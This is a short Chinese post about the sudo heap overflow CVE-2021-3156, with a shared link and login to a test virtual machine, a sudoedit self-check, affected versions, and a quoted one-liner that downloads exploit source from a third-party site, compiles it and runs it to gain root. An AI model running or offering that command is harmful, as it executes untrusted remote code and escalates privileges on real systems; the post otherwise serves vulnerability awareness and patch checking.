Text.
这个漏洞太强了,我觉得近一段时间这个都可以维持了。这里贴上宽字节安全给的虚拟机链接。
链接:https://pan.baidu.com/s/18Bc-HipGuBxq_Fg2dzZVlg
提取码:unic
虚拟机的用户名密码为 vagrant/unicodesec
CVE-2021-3156: 缓冲区溢出漏洞
在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。
用户可以使用如下方法进行自查: 以非root用户登录系统,并使用命令sudoedit -s /
-
如果响应一个以 sudoedit:
开头的报错,那么表明存在漏洞。 -
如果响应一个以 usage:
开头的报错,那么表明补丁已经生效。
漏洞影响版本
sudo 1.8.2-1.8.31p2
sudo 1.9.0-1.9.5p1
不受影响版本:sudo 1.9.5p2
漏洞复现
更有小伙伴在朋友圈贴出几句话提权
mkdir CVE-2021-3156 && cd CVE-2021-3156/ && wget www.itznxh.com/CVE-2021-3156/hax.c && wget www.itznxh.com/CVE-2021-3156/lib.c &&wget www.itznxh.com/CVE-2021-3156/Makefile && make &&./sudo-hax-me-a-sandwich 0
提完收工。